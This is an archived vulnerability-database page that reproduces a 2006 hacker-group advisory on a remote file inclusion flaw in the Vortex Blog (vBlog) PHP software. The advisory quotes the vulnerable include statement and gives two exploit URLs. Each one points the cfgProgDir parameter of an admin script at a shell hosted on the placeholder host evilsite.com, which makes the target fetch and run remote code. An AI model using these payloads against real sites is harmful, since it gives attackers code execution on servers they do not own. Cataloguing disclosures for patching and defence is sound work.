Lucene search

vblog1201-rfi.txt

🗓️ 09 Nov 2006 00:00:00Reported by Dr.PantagonType

packetstorm🔗 packetstormsecurity.com👁 27 Views

Remote File Inclusion in Vortex Blog with exploitation detail

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`**********************************************************************************************************  
WwW.Deltahacking.NeT (Priv8 Site)  
WwW.Deltahacking.Ir (Public Site)  
**********************************************************************************************************  
  
* Portal Name :Vortex Blog AKA vBlog  
  
* Class = Remote File Inclusion ;  
  
* Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip  
  
* Found by = Dr.Pantagon ([email protected])  
  
--------------------------------------------------------------------------------------------  
  
--------------  
- Vulnerable Code  
  
include($cfgProgDir . "session.php");  
  
++++++++++++++++++++++++++++++++++++++++++++  
  
- Exploit:  
  
  
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?  
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?  
  
  
--------------------------------------------------------------------------------------------  
  
--------------  
  
Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord  
Special Thanks To Best My Friend : Tanha  
  
**********************************************************************************************************  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

09 Nov 2006 00:00Current

7.4High risk

Vulners AI Score7.4